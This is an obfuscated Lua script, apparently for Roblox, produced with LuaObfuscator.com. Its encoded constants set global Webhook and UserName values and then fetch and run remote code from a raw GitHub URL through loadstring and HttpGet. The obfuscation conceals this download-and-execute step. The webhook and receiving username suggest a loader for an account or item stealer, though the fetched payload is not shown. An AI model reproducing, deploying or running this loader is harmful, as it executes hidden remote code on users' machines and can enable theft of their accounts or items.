--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v71,v19);v19=nil;v96=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0;local v73;while true do if (v72==0) then v73=(v31/(((882 -(282 + 595)) -3)^(v32-(2 -1))))%((3 -(1638 -(1523 + 114)))^(((v33-(2 -1)) -(v32-1)) + (620 -(499 + 56 + 64)))) ;return v73-(v73%(932 -(857 + 74))) ;end end else local v74=((812 -242) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and (1 + 0)) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + 2 ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23()local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + 85))) then return (v41 * ((30184377 -13742562) + 335401)) + (v40 * (14533 + 51003)) + (v39 * (1213 -(892 + 65))) + v38 ;end if (v37==0) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + (9 -5) ;v37=1 -0 ;end end end local function v24()local v42=350 -(87 + 263) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(181 -((1490 -(630 + 793)) + 113))) then v45=1 + (0 -0) ;v46=(v20(v44,1,49 -29 ) * ((2 + 0)^(127 -95))) + v43 ;v42=(4516 -3562) -(802 + (1035 -(261 + 624))) ;end if (v42==(5 -3)) then v47=v20(v44,37 -(7 + 9) ,(1614 -1145) -(145 + 293) );v48=((v20(v44,32)==(431 -((77 -33) + 386))) and  -(1 + 0)) or (998 -(915 + 82)) ;v42=8 -5 ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=(1748 -(760 + 987)) -0 ;end if (v42==(12 -(1922 -(1789 + 124)))) then if (v47==(1187 -(1069 + 118))) then if (v46==0) then return v48 * (0 -0) ;else local v98=0 + 0 ;while true do if (v98==(0 -0)) then v47=1 + 0 ;v45=859 -(814 + 45) ;break;end end end elseif (v47==((4402 -(745 + 21)) -1589)) then return ((v46==(0 + 0 + 0)) and (v48 * ((2 -1)/(791 -(368 + 423))))) or (v48 * NaN) ;end return v8(v48,v47-((8843 -5629) -(3271 -(1020 + 60))) ) * (v45 + (v46/(2^(70 -(10 + 8))))) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v68=1 + 0 , #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=1322 -(1249 + 73) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2;end if (v52==(1140 -(782 + 356))) then v57=nil;v58=nil;v52=1148 -(466 + 679) ;end if (v52==(0 -0)) then v53=0 -0 ;v54=nil;v52=2 -1 ;end if (v52==4) then while true do if (v53==(1901 -(106 + 1794))) then v56=nil;v57=nil;v53=2;end if (v53==(0 + 0)) then local v94=0 + 0 ;while true do if (v94==(2 -1)) then v53=2 -1 ;break;end if ((114 -(4 + 110))==v94) then v54=584 -(57 + 527) ;v55=nil;v94=1428 -(41 + 1386) ;end end end if (v53~=(105 -(17 + 86))) then else local v95=0;while true do if (v95==(1 + 0)) then v53=6 -3 ;break;end if (v95~=(0 -0)) then else v58=nil;v59=nil;v95=167 -(122 + 44) ;end end end if (3~=v53) then else v60=nil;while true do local v99=0;while true do if (v99~=0) then else if (v54==3) then local v106=1018 -(697 + 321) ;while true do if (v106==(0 -0)) then local v110=0 -0 ;while true do if ((0 -0)==v110) then for v153=1,v23() do v56[v153-(1 -0) ]=v28();end return v58;end end end end end if (v54==(3 -2)) then local v107=0 + 0 ;while true do if (v107==(1227 -(322 + 905))) then v58={v55,v56,nil,v57};v59=v23();v107=66 -(30 + 35) ;end if (v107~=(873 -(826 + 46))) then else v60={};v54=949 -(245 + 702) ;break;end end end v99=1;end if (v99==(3 -2)) then if (2==v54) then local v108=0;local v109;while true do if (v108~=(0 + 0)) then else v109=1898 -(260 + 1638) ;while true do if ((0 + 0)==v109) then local v130=440 -(382 + 58) ;while true do if (v130==1) then v109=3 -2 ;break;end if (v130==(1257 -(1043 + 214))) then for v166=1,v59 do local v167=0 -0 ;local v168;local v169;local v170;local v171;while true do if ((1 -0)~=v167) then else v170=nil;v171=nil;v167=5 -3 ;end if (v167~=(1205 -(902 + 303))) then else v168=0 -0 ;v169=nil;v167=1213 -(323 + 889) ;end if (v167~=(4 -2)) then else while true do if (v168==(2 -1)) then v171=nil;while true do if (v169==1) then if (v170==(1 + 0)) then v171=v21()~=(580 -(361 + 219)) ;elseif (v170==(322 -(53 + 267))) then v171=v24();elseif (v170==(217 -(22 + 192))) then v171=v25();end v60[v166]=v171;break;end if (v169~=(0 + 0)) then else local v183=0;local v184;while true do if (v183==0) then v184=1463 -(1404 + 59) ;while true do if (v184~=0) then else local v189=0;while true do if ((414 -(15 + 398))==v189) then v184=1;break;end if (v189==(982 -(18 + 964))) then v170=v21();v171=nil;v189=1;end end end if (v184~=(1 -0)) then else v169=766 -(468 + 297) ;break;end end break;end end end end break;end if (v168==(0 -0)) then local v175=0 + 0 ;while true do if (v175==(1 + 0)) then v168=1;break;end if (v175~=(850 -(20 + 830))) then else v169=0 + 0 ;v170=nil;v175=127 -(116 + 10) ;end end end end break;end end end v58[3]=v21();v130=1;end end end if (v109==(2 -1)) then for v155=1 + 0 ,v23() do local v156=738 -(542 + 196) ;local v157;local v158;local v159;while true do if (v156==0) then v157=0;v158=nil;v156=1 -0 ;end if (v156==(1 + 0)) then v159=nil;while true do if (v157==(1 + 0)) then while true do if ((0 + 0)~=v158) then else v159=v21();if (v20(v159,1 + 0 ,1)==0) then local v176=0 -0 ;local v177;local v178;local v179;local v180;local v181;while true do if (v176==(0 -0)) then v177=0 -0 ;v178=nil;v176=1 + 0 ;end if (v176==(2 -1)) then v179=nil;v180=nil;v176=1553 -(1126 + 425) ;end if (v176==2) then v181=nil;while true do if (v177==(0 + 0)) then local v185=405 -(118 + 287) ;local v186;while true do if (v185==(0 -0)) then v186=1121 -(118 + 1003) ;while true do if (v186~=(0 -0)) then else local v200=377 -(142 + 235) ;while true do if (v200==0) then v178=0 -0 ;v179=nil;v200=1 + 0 ;end if (v200==1) then v186=1;break;end end end if (v186~=(978 -(553 + 424))) then else v177=1 -0 ;break;end end break;end end end if (v177~=(1 + 0)) then else local v187=0 + 0 ;local v188;while true do if (v187==(0 + 0)) then v188=765 -(574 + 191) ;while true do if (v188==(0 + 0)) then local v201=0 + 0 ;while true do if (v201==(0 -0)) then v180=nil;v181=nil;v201=2 -1 ;end if (v201==(2 -1)) then v188=1 + 0 ;break;end end end if (v188==(127 -(55 + 71))) then v177=2 -0 ;break;end end break;end end end if ((1792 -(573 + 1217))==v177) then while true do if (v178~=(14 -11)) then else if (v20(v180,756 -(239 + 514) ,3)~=(1 + 0)) then else v181[5 -1 ]=v60[v181[943 -(714 + 225) ]];end v55[v155]=v181;break;end if ((2 -1)~=v178) then else local v191=0;local v192;while true do if (v191==(0 -0)) then v192=1329 -(797 + 532) ;while true do if (v192~=(1 + 0)) then else v178=1 + 1 ;break;end if (v192==(0 -0)) then local v202=806 -(118 + 688) ;while true do if ((48 -(25 + 23))==v202) then v181={v22(),v22(),nil,nil};if (v179==0) then local v204=731 -(476 + 255) ;local v205;while true do if (v204~=(1130 -(369 + 761))) then else v205=0;while true do if (v205==(0 -0)) then v181[2 + 1 ]=v22();v181[4]=v22();break;end end break;end end elseif (v179==(1 -0)) then v181[288 -(175 + 110) ]=v23();elseif (v179==(3 -1)) then v181[241 -(64 + 174) ]=v23() -((4 -2)^(3 + 13)) ;elseif (v179~=(3 -0)) then else local v214=0;while true do if (v214~=(1796 -(503 + 1293))) then else v181[339 -(144 + 192) ]=v23() -((2 + 0)^(1077 -(810 + 251))) ;v181[220 -(42 + 174) ]=v22();break;end end end v202=1 + 0 ;end if (v202~=1) then else v192=1 + 0 ;break;end end end end break;end end end if (v178==0) then local v193=0 + 0 ;local v194;local v195;while true do if (v193==(533 -(43 + 490))) then v194=733 -(711 + 22) ;v195=nil;v193=1;end if (v193==(1 + 0)) then while true do if (v194==0) then v195=1504 -(363 + 1141) ;while true do if (v195==(1581 -(1183 + 397))) then v178=1 + 0 ;break;end if (v195==(0 -0)) then v179=v20(v159,2,1 + 2 );v180=v20(v159,3 + 1 ,5 + 1 );v195=1976 -(1913 + 62) ;end end break;end end break;end end end if (v178==(407 -(255 + 150))) then local v196=0 + 0 ;local v197;while true do if (v196==(0 + 0)) then v197=0 -0 ;while true do if (v197==0) then local v203=0;while true do if (v203==(1933 -(565 + 1368))) then if (v20(v180,3 -2 ,1662 -(1477 + 184) )==(1 -0)) then v181[408 -(183 + 223) ]=v60[v181[2]];end if (v20(v180,2,2 + 0 )==(857 -(564 + 292))) then v181[3]=v60[v181[3]];end v203=1 -0 ;end if (v203~=(2 -1)) then else v197=1;break;end end end if (v197~=(305 -(244 + 60))) then else v178=3 + 0 ;break;end end break;end end end end break;end end break;end end end break;end end break;end if (v157==(476 -(41 + 435))) then local v174=1001 -(938 + 63) ;while true do if (v174~=(1 + 0)) then else v157=1 + 0 ;break;end if (v174~=(449 -(108 + 341))) then else v158=0 + 0 ;v159=nil;v174=1126 -(936 + 189) ;end end end end break;end end end v54=3;break;end end break;end end end if (v54~=0) then else v55={};v56={};v57={};v54=1 + 0 ;end break;end end end break;end end break;end if (v52==(1496 -(711 + 782))) then v59=nil;v60=nil;v52=1617 -(1565 + 48) ;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (v93==1) then if (v91<=10) then if (v91<=4) then if (v91<=1) then if (v91==0) then v88[v90[2]][v90[3]]=v90[4];else local v113=v90[2];local v114=v88[v90[3]];v88[v113 + 1 ]=v114;v88[v113]=v114[v90[4]];end elseif (v91<=2) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>3) then v88[v90[2]]=v90[3];else v88[v90[2]]=v90[3];end elseif (v91<=7) then if (v91<=5) then v82=v90[3];elseif (v91==6) then v88[v90[2]]();elseif (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91<=8) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end elseif (v91==9) then local v136=v90[2];v88[v136]=v88[v136](v13(v88,v136 + 1 ,v83));else local v138=v90[2];local v139=v88[v90[3]];v88[v138 + 1 ]=v139;v88[v138]=v139[v90[4]];end elseif (v91<=15) then if (v91<=12) then if (v91>11) then do return;end else v88[v90[2]]();end elseif (v91<=13) then local v120=v90[2];v88[v120]=v88[v120](v13(v88,v120 + 1 ,v83));elseif (v91>14) then v88[v90[2]]=v63[v90[3]];else do return;end end elseif (v91<=18) then if (v91<=16) then v88[v90[2]][v90[3]]=v90[4];elseif (v91>17) then v88[v90[2]]=v90[3]~=0 ;else local v146=v90[2];local v147,v148=v81(v88[v146](v13(v88,v146 + 1 ,v90[3])));v83=(v148 + v146) -1 ;local v149=0;for v160=v146,v83 do local v161=0;while true do if (v161==0) then v149=v149 + 1 ;v88[v160]=v147[v149];break;end end end end elseif (v91<=19) then local v124=v90[2];local v125,v126=v81(v88[v124](v13(v88,v124 + 1 ,v90[3])));v83=(v126 + v124) -1 ;local v127=0;for v128=v124,v83 do local v129=0;while true do if (v129==0) then v127=v127 + 1 ;v88[v128]=v125[v127];break;end end end elseif (v91==20) then v88[v90[2]]=v63[v90[3]];else v82=v90[3];end v82=v82 + 1 ;break;end end end end;end if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703073O00576562682O6F6B03013O0020030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A03083O00557365724E616D6503083O0033376B417374726F03093O00557365724E616D653200173O0012043O00013O0026083O000E000100020004153O000E000100120F000100033O00302O00010004000500120F000100063O00120F000200073O002001000200020008001204000400094O0002000500014O0013000200054O000D00013O00022O000B0001000100010004153O001600010026083O0001000100010004153O0001000100120F000100033O00302O0001000A000B00120F000100033O00302O0001000C000B0012043O00023O0004153O000100012O000C3O00017O00",v9(),...);end
